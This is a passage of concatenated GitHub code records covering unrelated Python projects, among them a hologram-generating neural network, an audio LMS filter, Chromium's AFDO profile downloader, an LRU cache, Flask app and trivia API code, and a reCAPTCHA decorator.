activation='relu', padding='same')(input)\n x = layers.Conv2D(n_feature_maps, (3, 3), activation='relu', padding='same')(x)\n return x\n\n def _cbn_layer(self, n_feature_maps, activation, input):\n if activation == 'tanh' or activation == 'relu':\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=activation, padding='same')(input)\n x = layers.BatchNormalization()(x)\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=activation, padding='same')(x)\n x = layers.BatchNormalization()(x)\n else:\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=None, padding='same')(input)\n x = layers.LeakyReLU(0.2)(x)\n x = layers.BatchNormalization()(x)\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=None, padding='same')(x)\n x = layers.LeakyReLU(0.2)(x)\n x = layers.BatchNormalization()(x)\n return x\n\n def _interleave(self, input):\n return tf.nn.space_to_depth(input=input, block_size=self.dataprovider.IF)\n\n def _deinterleave(self, input):\n return tf.nn.depth_to_space(input=input, block_size=self.dataprovider.IF)\n\n def _target_field(self, init_num_features, input_layer):\n x1 = self._cbn_layer(init_num_features, 'LeakyReLu', input_layer)\n x = layers.MaxPooling2D((2, 2), padding='same')(x1)\n\n x2 = self._cbn_layer(init_num_features * 2, 'LeakyReLu', x)\n x = layers.MaxPooling2D((2, 2), padding='same')(x2)\n\n x3 = 
self._cbn_layer(init_num_features * 4, 'LeakyReLu', x)\n x = layers.MaxPooling2D((2, 2), padding='same')(x3)\n\n x4 = self._cbn_layer(init_num_features * 8, 'LeakyReLu', x)\n x = layers.MaxPooling2D((2, 2), padding='same')(x4)\n\n x5 = self._cbn_layer(init_num_features * 16, 'relu', x)\n x = layers.UpSampling2D()(x5)\n\n concat4 = layers.concatenate([x4, x])\n x6 = self._cbn_layer(init_num_features * 8, 'relu', concat4)\n x = layers.UpSampling2D()(x6)\n\n concat3 = layers.concatenate([x3, x])\n x7 = self._cbn_layer(init_num_features * 4, 'relu', concat3)\n x = layers.UpSampling2D()(x7)\n\n concat2 = layers.concatenate([x2, x])\n x8 = self._cbn_layer(init_num_features * 2, 'relu', concat2)\n x = layers.UpSampling2D()(x8)\n\n concat1 = layers.concatenate([x1, x])\n x9 = self._cbn_layer(init_num_features, 'tanh', concat1)\n\n return x9\n\n def _branching(self, previous, before_unet):\n\n real_branch = self._cc_layer(self.dataprovider.nK, previous)\n real_branch = layers.concatenate([real_branch, before_unet])\n real_branch = layers.Conv2D(self.dataprovider.IF ** 2, (3, 3), activation='relu', padding='same')(real_branch)\n\n imag_branch = self._cc_layer(self.dataprovider.nK, previous)\n imag_branch = layers.concatenate([imag_branch, before_unet])\n imag_branch = layers.Conv2D(self.dataprovider.IF ** 2, (3, 3), activation=None, padding='same')(imag_branch)\n\n de_int_real = layers.Lambda(self._deinterleave, name=\"De-interleave_real\")(real_branch)\n de_int_imag = layers.Lambda(self._deinterleave, name=\"De-interleave_imag\")(imag_branch)\n\n slm_field = layers.Lambda(self._prop_to_slm, name=\"SLM_phase\")([de_int_real, de_int_imag])\n\n return slm_field\n\n def build_model(self):\n inp = Input(shape=(self.dataprovider.Mx,\n self.dataprovider.My,\n self.dataprovider.nz),\n name='Input',\n batch_size=self.dataprovider.batchsize)\n interleaved = layers.Lambda(self._interleave, name=\"interleave\")(inp)\n target_field = self._target_field(self.dataprovider.nK, interleaved)\n slm_phase = self._branching(target_field, interleaved)\n\n model = Model(inp, slm_phase)\n return model\n\n def train_network(self):\n train_dir, val_dir = self.training_data\n train_files = tf.io.gfile.glob(train_dir + \"/file_*.tfrecords\")\n val_files = tf.io.gfile.glob(val_dir + \"/file_*.tfrecords\")\n\n if self.pretrained:\n answer = input(\"Are you sure you want to train this model again? 
[y/n]\")\n            if answer != 'y':\n                return\n\n        early_stop = tf.keras.callbacks.EarlyStopping(monitor='loss', min_delta=0.0005, patience=3, mode=\"min\")\n\n        self.model.compile(\n            loss=self._loss_func,\n            optimizer=tf.keras.optimizers.Adam(learning_rate=self.lr),\n        )\n\n        train_input_fn = _get_input_fn(filenames=train_files, epochs=self.dataprovider.epochs, batchsize=self.dataprovider.batchsize, shape=self.input_shape)\n        eval_input_fn = _get_input_fn(filenames=val_files, epochs=self.dataprovider.epochs, batchsize=self.dataprovider.batchsize, shape=self.input_shape)\n        training_history = self.model.fit(\n            train_input_fn,\n            epochs=self.dataprovider.epochs,\n            validation_data=eval_input_fn,\n            steps_per_epoch=self.dataprovider.nT // self.dataprovider.batchsize,\n            callbacks=[early_stop]\n        )\n        return training_history  # return fit()'s History object; self.params was never defined on this class\n\n    def save_model(self, model_path=None):\n        model_path = model_path if model_path is not None else self.model_name\n        existing_path = self.path / \"saved_models\" / model_path\n        if os.path.exists(existing_path):\n            now = datetime.now()\n            model_name = self.model_name + now.strftime(\"%m/%d/%Y-%H:%M:%S\")\n        else:\n            model_name = self.model_name\n        model_save_path = self.path / \"saved_models\" / model_name\n        self.model.save(model_save_path)\n        print(\"Model was saved\")\n\n    def get_hologram(self, target):\n        print(\"Generating hologram\")\n        return self.model(target)\n\n\n\n\n# ---- COMPLEXITY OF PRIMITIVES ---- #\ndef conv2d_cx(cx, w_in, w_out, k, stride=1, groups=1):\n    h, w, flops, params, acts = cx[\"h\"], cx[\"w\"], cx[\"flops\"], cx[\"params\"], cx[\"acts\"]\n    h, w = (h - 1) // stride + 1, (w - 1) // stride + 1\n    flops += k * k * w_in * w_out * h * w // groups\n    params += k * k * w_in * w_out // groups\n    acts += w_out * h * w\n    return {\"h\": h, \"w\": w, \"flops\": flops, \"params\": params, \"acts\": acts}\n\n\ndef batchnorm2d_cx(cx, w_in):\n    h, w, flops, params, acts = cx[\"h\"], cx[\"w\"], cx[\"flops\"], cx[\"params\"], cx[\"acts\"]\n    params += 2 * w_in\n    return {\"h\": h, \"w\": w, \"flops\": flops, \"params\": params, \"acts\": acts}\n\n","repo_name":"Andreasgejlm/SingleCGHModel","sub_path":"CGHModel/CGHModel.py","file_name":"CGHModel.py","file_ext":"py","file_size_in_byte":11506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
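The `conv2d_cx` / `batchnorm2d_cx` helpers that close the record above thread a running cost dict through successive calls. A minimal usage sketch (layer shapes and channel counts are invented for illustration; this is not from the original repo):

```python
# Cost a tiny conv -> BN -> conv stack by chaining the *_cx helpers.
cx = {"h": 64, "w": 64, "flops": 0, "params": 0, "acts": 0}
cx = conv2d_cx(cx, w_in=3, w_out=32, k=3, stride=2)  # stride 2: 64x64 -> 32x32
cx = batchnorm2d_cx(cx, w_in=32)                     # BN adds 2 * 32 parameters
cx = conv2d_cx(cx, w_in=32, w_out=64, k=3)
print(cx["flops"], cx["params"], cx["acts"])
```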
 +{"seq_id":"32610916930","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# mean and standard deviation\nmean, sigma = 0, 0.1 \nsr = 8000\ntime_s = 5\nsine_freq = 1000\nsig_amp = 0.0001\nsample = sr * time_s\n\n# Python computes with input values in the -1 to 1 range, so the coefficients must be set very small.\n# However, to view the values intuitively, we multiply or divide by short's max+1 value. \nshort_max = 32768\n\n# Generate 5 seconds of white noise\ns = sig_amp*np.random.normal(mean, sigma, sample) * short_max\nplt.plot(s)\nplt.show()\n\n# Generate a 5-second 1000 Hz tone signal\nx = np.arange(sample)\ny = sig_amp*np.sin(2 * np.pi * sine_freq * x / sr) * short_max\nplt.plot(x[0:100], y[0:100])\nplt.show()\n\n# Mix the two signals\ntone_white = y+s \n\n#FFT\nimport librosa\nimport scipy.signal as signal\nimport librosa.display\nimport numpy as np\n\n#normalize_function\nmin_level_db = -100\ndef _normalize(S):\n    return np.clip((S-min_level_db)/(-min_level_db), 0, 1)\n\namplitude = np.abs(librosa.stft(tone_white/short_max, n_fft=1024, hop_length=512,\n                win_length = 1024, window=signal.hann))\nmag_db = librosa.amplitude_to_db(amplitude)\nmag_n = _normalize(mag_db)\nlibrosa.display.specshow(mag_n, y_axis='linear', x_axis='time')\nplt.show()\n\n# Apply the LMS algorithm\nlms_size = 16\nstep_size = 0.0025\nN = len(tone_white)-lms_size+1\n\nfilter_w = np.zeros(lms_size) \nfilterout_y = np.zeros(N)\nerr = np.zeros(N)\nfor n in range(N):\n    x_in = tone_white[n:n+lms_size]\n    filterout_y[n] = np.dot(x_in, filter_w.T)\n    err[n] = tone_white[n + lms_size -1] - filterout_y[n]\n    # A small or zero sum makes the result come out wrong; add 10 to prevent this.\n    sum_val = sum(x_in) + 10\n    filter_w = filter_w + step_size * err[n] * (x_in / sum_val)\n\namplitude = np.abs(librosa.stft(err/short_max, n_fft=1024, hop_length=512, win_length = 1024, window=signal.hann))\nmag_db = librosa.amplitude_to_db(amplitude)\nmag_n = _normalize(mag_db)\nlibrosa.display.specshow(mag_n, y_axis='linear', x_axis='time')\nplt.show()\n","repo_name":"Capstone-design2-AIS/git-project","sub_path":"음성인식 실험-1/sound - 6.py","file_name":"sound - 6.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26725113628","text":"import turtle as t\n\nt.bgcolor('black')\ncolors =('cyan','red','blue','violet')\nt.speed(0)\nfor i in range(60):\n    t.pencolor(colors[i%4])\n    t.width(2)\n    t.forward(i)\n    t.circle(90,steps=5)\n    t.forward(i)\n    t.right(45)\nt.hideturtle()\nt.done()","repo_name":"NitulKalita/PythonTurtle","sub_path":"design with pentagons.py","file_name":"design with pentagons.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"12826343705","text":"import argparse\nimport contextlib\nimport os\nimport subprocess\nimport sys\nimport urllib2\n\nGS_BASE_URL = 'https://storage.googleapis.com/chromeos-prebuilt/afdo-job/llvm'\nPROFILE_DIRECTORY = os.path.abspath(os.path.dirname(__file__))\nLOCAL_PROFILE_PATH = os.path.join(PROFILE_DIRECTORY, 'afdo.prof')\n\n# We use these to track the local profile; newest.txt is owned by git and tracks\n# the name of the newest profile we should pull, and local.txt is the most\n# recent profile we've successfully pulled.\nNEWEST_PROFILE_NAME_PATH = os.path.join(PROFILE_DIRECTORY, 'newest.txt')\nLOCAL_PROFILE_NAME_PATH = os.path.join(PROFILE_DIRECTORY, 'local.txt')\n\n\ndef ReadUpToDateProfileName():\n  with open(NEWEST_PROFILE_NAME_PATH) as f:\n    return f.read().strip()\n\n\ndef ReadLocalProfileName():\n  try:\n    with open(LOCAL_PROFILE_NAME_PATH) as f:\n      return f.read().strip()\n  except IOError:\n    # Assume it either didn't exist, or we couldn't read it. 
In either case, we\n # should probably grab a new profile (and, in doing so, make this file sane\n # again)\n return None\n\n\ndef WriteLocalProfileName(name):\n with open(LOCAL_PROFILE_NAME_PATH, 'w') as f:\n f.write(name)\n\n\ndef CheckCallOrExit(cmd):\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = proc.communicate()\n exit_code = proc.wait()\n if not exit_code:\n return\n\n complaint_lines = [\n '## %s failed with exit code %d' % (cmd[0], exit_code),\n '## Full command: %s' % cmd,\n '## Stdout:\\n' + stdout,\n '## Stderr:\\n' + stderr,\n ]\n print >>sys.stderr, '\\n'.join(complaint_lines)\n sys.exit(1)\n\n\ndef RetrieveProfile(desired_profile_name, out_path):\n # vpython is > python 2.7.9, so we can expect urllib to validate HTTPS certs\n # properly.\n ext = os.path.splitext(desired_profile_name)[1]\n compressed_path = out_path + ext\n gs_url = GS_BASE_URL + '/' + desired_profile_name\n with contextlib.closing(urllib2.urlopen(gs_url)) as u:\n with open(compressed_path, 'wb') as f:\n while True:\n buf = u.read(4096)\n if not buf:\n break\n f.write(buf)\n\n if ext == '.bz2':\n # NOTE: we can't use Python's bzip module, since it doesn't support\n # multi-stream bzip files. It will silently succeed and give us a garbage\n # profile.\n # bzip2 removes the compressed file on success.\n CheckCallOrExit(['bzip2', '-d', compressed_path])\n elif ext == '.xz':\n # ...And we can't use the `lzma` module, since it was introduced in python3.\n # xz removes the compressed file on success.\n CheckCallOrExit(['xz', '-d', compressed_path])\n else:\n # Wait until after downloading the file to check the file extension, so the\n # user has something usable locally if the file extension is unrecognized.\n raise ValueError(\n 'Only bz2 and xz extensions are supported; \"%s\" is not' % ext)\n\n\ndef CleanProfilesDirectory():\n # Start with a clean slate, removing old profiles/downloads/etc.\n old_artifacts = (p for p in os.listdir(PROFILE_DIRECTORY) if\n p.startswith('chromeos-chrome-'))\n for artifact in old_artifacts:\n os.remove(os.path.join(PROFILE_DIRECTORY, artifact))\n\n\ndef main():\n parser = argparse.ArgumentParser('Downloads profiles provided by Chrome OS')\n parser.add_argument('-f', '--force', action='store_true',\n help='Fetch a profile even if the local one is current')\n args = parser.parse_args()\n\n up_to_date_profile = ReadUpToDateProfileName()\n if not args.force:\n local_profile_name = ReadLocalProfileName()\n # In a perfect world, the local profile should always exist if we\n # successfully read local_profile_name. 
If it's gone, though, the user\n  # probably removed it as a way to get us to download it again.\n  if local_profile_name == up_to_date_profile \\\n      and os.path.exists(LOCAL_PROFILE_PATH):\n    return 0\n\n  CleanProfilesDirectory()\n\n  new_tmpfile = LOCAL_PROFILE_PATH + '.new'\n  RetrieveProfile(up_to_date_profile, new_tmpfile)\n  os.rename(new_tmpfile, LOCAL_PROFILE_PATH)\n  WriteLocalProfileName(up_to_date_profile)\n\n\nif __name__ == '__main__':\n  sys.exit(main())\n","repo_name":"kiwibrowser/src","sub_path":"chrome/android/profiles/update_afdo_profile.py","file_name":"update_afdo_profile.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"73434879524","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def hasPathSum(self, root: TreeNode, s: int) -> bool:\n        \n        if not root:\n            return False\n        \n        ans = False\n        \n        # subtract the current node's value; a leaf that lands exactly on 0\n        # completes a root-to-leaf path\n        sub = s - root.val\n        \n        if(sub == 0 and root.left == None and root.right == None):\n            return True\n        \n        if root.left is not None:\n            ans = ans or self.hasPathSum(root.left, sub)\n        if root.right is not None:\n            ans = ans or self.hasPathSum(root.right, sub)\n        \n        return ans\n","repo_name":"bharat787/DSA","sub_path":"LC/hasPathSum.py","file_name":"hasPathSum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
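A quick smoke test for the `hasPathSum` record above (the `TreeNode` class mirrors the commented-out definition in the record; the tree and target sums are invented for illustration):

```python
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right

# 5 -> 4 -> 13 is a root-to-leaf path summing to 22.
root = TreeNode(5, TreeNode(4, TreeNode(13)), TreeNode(8))
print(Solution().hasPathSum(root, 22))  # True
print(Solution().hasPathSum(root, 10))  # False: no root-to-leaf path sums to 10
```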
 +{"seq_id":"70749416164","text":"from typing import Counter, TypeVar, Generic\n\nT = TypeVar(\"T\")\n\n\nclass Node(object):\n    def __init__(self, key, val: T):\n        self.key = key\n        self.val = val\n        self.prev = None\n        self.next = None\n\n\nclass LRUCache:\n    def __init__(self, capacity) -> None:\n        self.capacity = capacity\n        self.head = None\n        self.tail = None\n        self.items = {}  # maps key -> Node, so we never spend O(n) searching the list for a key\n\n    '''Move cur_node to the head of the linked list'''\n\n    def move_cur_node_to_haed(self, cur_node):\n        cur_node.next = self.head\n        self.head.prev = cur_node\n        self.head = cur_node\n\n    def put(self, key, val: T):\n        # key does not exist: add the new Node at the head of the list\n        if key not in self.items.keys():\n            newNode = Node(key, val)\n            self.items[key] = newNode\n            # first Node ever added: set both head and tail\n            if self.head is None and self.tail is None:\n                self.head = newNode\n                self.tail = newNode\n            else:\n                self.move_cur_node_to_haed(newNode)\n            # after adding a Node, evict the tail Node if the list exceeds capacity\n            if len(self.items) > self.capacity:\n                tail_node = self.tail\n                # remove the entry for tail_node.key from items\n                self.items.pop(tail_node.key)\n                # update the tail pointer\n                self.tail = tail_node.prev\n                self.tail.next = None\n                del tail_node\n        # key exists: update depending on whether the node is head, tail, or in between\n        else:\n            cur_node = self.items[key]\n            cur_node.val = val\n            # if the node is head, setting node.val is all that is needed\n            # the Node is the tail\n            if cur_node is self.tail:\n                # update the tail pointer\n                self.tail = cur_node.prev\n                self.tail.next = None\n                # move cur_node to the head of the list\n                self.move_cur_node_to_haed(cur_node)\n            # the node is neither head nor tail\n            elif cur_node is not self.head:\n                prev_node = cur_node.prev\n                next_node = cur_node.next\n                prev_node.next = next_node\n                next_node.prev = prev_node\n                # move cur_node to the head of the list\n                self.move_cur_node_to_haed(cur_node)\n\n    '''\n    The node matching the key is:\n    1. head: simply return node.val\n    2. tail: update the tail pointer and move the node to the head of the list\n    3. anywhere else: unlink the node from its current position and move it to the head of the list\n    '''\n\n    def get(self, key):\n        if key in self.items.keys():\n            cur_node = self.items[key]\n            # the Node is the tail\n            if cur_node is self.tail:\n                # if cur_node is the tail node, point the tail at cur_node.prev\n                self.tail = cur_node.prev\n                self.tail.next = None\n                # move cur_node to the head of the list\n                self.move_cur_node_to_haed(cur_node)\n            # the node is neither head nor tail\n            elif cur_node is not self.head:\n                # unlink cur_node from its current position\n                prev_node = cur_node.prev\n                next_node = cur_node.next\n                prev_node.next = next_node\n                next_node.prev = prev_node\n                # move cur_node to the head of the list\n                self.move_cur_node_to_haed(cur_node)\n\n            return cur_node.val\n        else:\n            return -1\n\n    def __repr__(self):\n        result = []\n        cur_node = self.head\n        while cur_node is not None:\n            result.append(str(cur_node.val))\n            cur_node = cur_node.next\n        return '->'.join(result)\n\n\nif __name__ == \"__main__\":\n    lru_cache = LRUCache(3)\n    lru_cache.put('30', 'curry')\n    lru_cache.put('23', 'Green')\n    lru_cache.put('0', 'Payton')\n    print(lru_cache)\n\n    print(f\"get(0): {lru_cache.get('0')}\")\n    print(lru_cache)\n\n    print(f\"get(30): {lru_cache.get('30')}\")\n    print(lru_cache)\n\n    print(f\"get(0): {lru_cache.get('0')}\")\n    print(lru_cache)\n\n    print(f\"put(11): {lru_cache.put('11','Thompson')}\")\n    print(lru_cache)\n\n    print(f\"{lru_cache.put('0','Arenas')}\")\n    print(lru_cache)\n\n    print(f\"{lru_cache.put('30','Wallace')}\")\n    print(lru_cache)\n","repo_name":"youngjay9/algorithm_for_python","sub_path":"linkedlist/leetCode/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73687749605","text":"import os\nimport flask\nfrom flask import current_app,Flask\n# from flask import flask, current_app\nimport arhamcollection_app.config as Config\n\n\nfrom .common import constants as COMMON_CONSTANTS\n\nfrom .main_app.views import main_app as ma\nfrom .user_management.views import user_management as um\nfrom .user_management.models import User\n\nfrom .main_app.errorhandling import *\nfrom arhamcollection_app.extensions import db,principal,login_manager,mail,csrf\n\n\n__all__ = ['create_app']\n\n\nDEFAULT_BLUEPRINTS = [\n    ma,um\n]\n\ndef create_app(config=None, app_name=None,blueprints=None):\n    if app_name is None:\n        app_name=Config.DevelopmentConfig.PROJECT\n    if blueprints is None:\n        blueprints=DEFAULT_BLUEPRINTS\n    app = Flask(app_name, instance_path=COMMON_CONSTANTS.INSTANCE_FOLDER_PATH, instance_relative_config=True)\n    configure_app(app, config=None)\n    configure_blueprints(app, blueprints)\n    configure_extensions(app)\n    app.register_error_handler(404,page_not_found_404)\n    app.register_error_handler(403,page_not_found_403)\n    app.register_error_handler(500,page_not_found_500)\n    return app\n\n\ndef configure_blueprints(app, blueprints):\n    for blueprint in blueprints:\n        app.register_blueprint(blueprint)\n\n\n\ndef configure_extensions(app):\n    # pass\n    print('INITIALIZING APP DATABASE')\n    db.init_app(app)\n\n    mail.init_app(app)\n    principal.init_app(app)\n    login_manager.init_app(app)\n    csrf.init_app(app)\n    # celery.init_app(app)\n    login_manager.login_view = \"user_management.login\"\n\n\n    @login_manager.user_loader\n    def load_user(user_id):\n        return User.query.get(int(user_id))\n\n\ndef configure_app(app, config=None):\n\n    app.config.from_object(Config.DevelopmentConfig)\n    \n    if config:\n        app.config.from_object(config)\n        return\n\n    # application_mode = os.getenv('APPLICATION_MODE', 'LOCAL')\n    # 
app.config.from_object(Config.get_config(application_mode))\n","repo_name":"findsarfaraz/arhamcollections","sub_path":"arhamcollection_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32485146161","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plot1(train_accuracy, validation_accuracy, train_loss, validation_loss):\n plt.figure(figsize=(4, 2))\n\n plt.subplot(121)\n plt.ylabel(\"Loss\")\n plt.xlabel(\"Epoch\")\n plt.plot(range(len(train_loss)), train_loss, label=\"train\")\n plt.plot(range(len(validation_loss)), validation_loss, label=\"valid\")\n\n plt.subplot(122)\n plt.ylabel(\"Accuracy\")\n plt.xlabel(\"Epoch\")\n plt.plot(range(len(train_accuracy)), train_accuracy, label=\"train\")\n plt.plot(range(len(validation_accuracy)), validation_accuracy, label=\"valid\")\n plt.gca().legend(loc=\"lower right\")\n\n plt.show()\n\n\ndef plot2(tacc,vacc,tloss,vloss):\n Epoch_count=len(tloss)\n Epochs=[]\n for i in range (0,Epoch_count):\n Epochs.append(i+1)\n index_loss=np.argmin(vloss)\n val_lowest=vloss[index_loss]\n index_acc=np.argmax(vacc)\n val_highest=vacc[index_acc]\n plt.style.use('fivethirtyeight')\n sc_label='best epoch= '+ str(index_loss+1)\n vc_label='best epoch= '+ str(index_acc + 1)\n fig,axes=plt.subplots(nrows=1, ncols=2, figsize=(15,5))\n axes[0].plot(Epochs,tloss, 'r', label='Training loss')\n axes[0].plot(Epochs,vloss,'g',label='Validation loss' )\n axes[0].scatter(index_loss+1,val_lowest, s=150, c= 'blue', label=sc_label)\n axes[0].set_title('Training and Validation Loss')\n axes[0].set_xlabel('Epochs')\n axes[0].set_ylabel('Loss')\n axes[0].legend()\n axes[1].plot (Epochs,tacc,'r',label= 'Training Accuracy')\n axes[1].plot (Epochs,vacc,'g',label= 'Validation Accuracy')\n axes[1].scatter(index_acc+1,val_highest, s=150, c= 'blue', label=vc_label)\n axes[1].set_title('Training and Validation Accuracy')\n axes[1].set_xlabel('Epochs')\n axes[1].set_ylabel('Accuracy')\n axes[1].legend()\n plt.tight_layout\n #plt.style.use('fivethirtyeight')\n plt.show()\n\n\nif __name__ == '__main__':\n history = json.load(open(\"history.json.txt\", 'r'))\n\n plot1(history[\"accuracy\"], history[\"val_accuracy\"], history[\"loss\"], history[\"val_loss\"])\n #plot2(history[\"accuracy\"], history[\"val_accuracy\"], history[\"loss\"], history[\"val_loss\"])","repo_name":"PiotrTrawinski/ChessClassification","sub_path":"plothelper.py","file_name":"plothelper.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26337995819","text":"import bottle\n\nfrom ddserver.utils.deps import extend, require\n\n\n\n@extend('ddserver.config:ConfigDeclaration')\ndef config_captcha(config_decl):\n with config_decl.declare('captcha') as s:\n s('enabled',\n conv = bool,\n default = False)\n s('recaptcha_public_key',\n conv = str,\n default = '')\n s('recaptcha_private_key',\n conv = str,\n default = '')\n\n\n\ndef captcha_check(__on_error__):\n ''' Checks if the captcha challenge and response in the request are matching.\n\n The challenge and response values are extracted from the POST data and\n passed to the recaptcha API.\n\n @param __on_error__: The target to redirect if the check failed\n '''\n\n def wrapper(func):\n @require(config = 'ddserver.config:Config',\n users = 'ddserver.interface.user:UserManager',\n messages = 
'ddserver.interface.message:MessageManager')\n def wrapped(config,\n users,\n messages,\n *args,\n **kwargs):\n if config.captcha.enabled:\n from recaptcha.client import captcha\n\n challenge = bottle.request.POST.pop('recaptcha_challenge_field', None)\n response = bottle.request.POST.pop('recaptcha_response_field', None)\n\n if challenge is None or response is None:\n messages.error('Captcha values are missing')\n bottle.redirect('/')\n\n result = captcha.submit(challenge,\n response,\n config.captcha.recaptcha_private_key,\n bottle.request.remote_addr)\n\n if not result.is_valid:\n messages.error('Captcha invalid')\n bottle.redirect(__on_error__)\n\n # Call the wrapped function\n return func(*args,\n **kwargs)\n\n return wrapped\n return wrapper\n","repo_name":"ddserver/ddserver","sub_path":"ddserver/interface/captcha.py","file_name":"captcha.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"43321103593","text":"import psycopg2\n\nfrom decrease_herbivorous import decrease_herbivorous\n\ndef start_transaction(cursor):\n cursor.execute('BEGIN')\n\ndef finish_transaction(db, cursor):\n cursor.execute('COMMIT')\n db.commit\n\ndef is_there_enough_food( cursor, num, sector_id ):\n print('SECTOR ID:', sector_id, type(sector_id))\n cursor.execute(f\"SELECT food FROM sectors WHERE id = {sector_id}\")\n food = cursor.fetchone()\n print(\"FOOD:\", food)\n if food: \n if food[0] - num >= 0: return True\n return False\n\ndef decrease_food( db, cursor, sector_id, infl_f ):\n print('decrease food')\n try:\n f = 1 + infl_f\n if is_there_enough_food( cursor, f, sector_id ):\n print('herb food update')\n cursor.execute(\"UPDATE sectors SET food = food - (%s) WHERE id=(%s)\", (f, sector_id, ))\n db.commit()\n else:\n decrease_herbivorous(db, cursor, sector_id)\n return False\n except psycopg2.Error as e:\n print('Error update', str(e))\n return False\n return True\n\ndef increase_amount( db, cursor, sector_id, user_id, infl_a ):\n print('increase amount')\n try:\n a = 1 + infl_a\n cursor.execute(\"UPDATE creatures SET amount = amount + (%s) WHERE user_id=(%s) AND sector_id=(%s)\", (a, user_id, sector_id, ))\n db.commit()\n except psycopg2.Error as e:\n print('Error update', str(e))\n return False\n return True\n\ndef herbivorous_skill( db, cursor, record, influence ):\n infl_f = influence['food']\n infl_a = influence['amount']\n if decrease_food( db, cursor, record[0], infl_f ):\n increase_amount( db, cursor, record[0], record[1], infl_a )\n\n","repo_name":"Larskaya/lena-api-evolution","sub_path":"methods/herbivorous.py","file_name":"herbivorous.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8332192894","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport random\n\nfrom models import db, setup_db, Question, Category\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n '''\n Endpoints\n '''\n\n @app.route('/categories')\n def get_all_categories():\n 
categories = Category.query.all()\n        return jsonify({\n            'success': True,\n            'categories': [category.format() for category in categories],\n            'total_categories': len(categories)\n        })\n\n    @app.route('/questions')\n    def get_paginated_questions():\n        page = request.args.get('page', 1, type=int)\n        questions = Question.query.order_by('id').all()\n        paginated_questions = questions[(page-1)*QUESTIONS_PER_PAGE:page*QUESTIONS_PER_PAGE]\n        categories = Category.query.all()\n        if len(paginated_questions) > 0:\n            return jsonify({\n                'success': True,\n                'questions': [question.format() for question in paginated_questions],\n                'total_questions': len(questions),\n                'categories': [category.format() for category in categories],\n                'current_category': None\n            })\n        else:\n            abort(404, 'The requested page is beyond the valid range.')\n\n    @app.route('/questions/<int:question_id>', methods=['DELETE'])\n    def delete_question(question_id):\n        success = True\n        question = Question.query.get(question_id)\n\n        if question is None:\n            abort(422, 'The question does not exist.')\n\n        try:\n            question.delete()\n        except Exception as e:\n            db.session.rollback()\n            success = False\n        finally:\n            db.session.close()\n\n        if success:\n            return jsonify({\n                'success': True,\n                'id': question_id\n            })\n        else:\n            abort(500, 'The question could not be deleted.')\n\n    @app.route('/questions', methods=['POST'])\n    def add_new_question():\n        success = True\n\n        search_term = request.json.get('search_term', None)\n        if search_term is not None:\n            matching_questions = Question.query.filter(Question.question.ilike(f'%{search_term}%')).all()\n            return jsonify({\n                'success': True,\n                'questions': [question.format() for question in matching_questions],\n                'total_questions': len(matching_questions),\n                'current_category': None\n            })\n\n        question = request.json.get('question', None)\n        if question is None:\n            abort(400, 'Missing field \\'question\\'.')\n\n        answer = request.json.get('answer', None)\n        if answer is None:\n            abort(400, 'Missing field \\'answer\\'.')\n\n        category = request.json.get('category', None)\n        if category is None:\n            abort(400, 'Missing field \\'category\\'.')\n\n        difficulty = request.json.get('difficulty', None)\n        if difficulty is None:\n            abort(400, 'Missing field \\'difficulty\\'.')\n\n        existing_question = Question.query.filter(Question.question.ilike(question)).first()\n        if existing_question is not None:\n            abort(409, 'The question already exists.')\n\n        try:\n            new_question = Question(\n                question=question,\n                answer=answer,\n                category=category,\n                difficulty=difficulty\n            )\n            new_question.insert()\n        except Exception as e:\n            db.session.rollback()\n            success = False\n        finally:\n            db.session.close()\n\n        if success:\n            return jsonify({\n                'success': True\n            }), 201\n        else:\n            abort(500, 'Adding the question to the database was unsuccessful.')\n\n    @app.route('/categories/<int:category_id>/questions')\n    def get_questions_by_category(category_id):\n        category = Category.query.get(category_id)\n        if category is None:\n            abort(422, 'The requested 
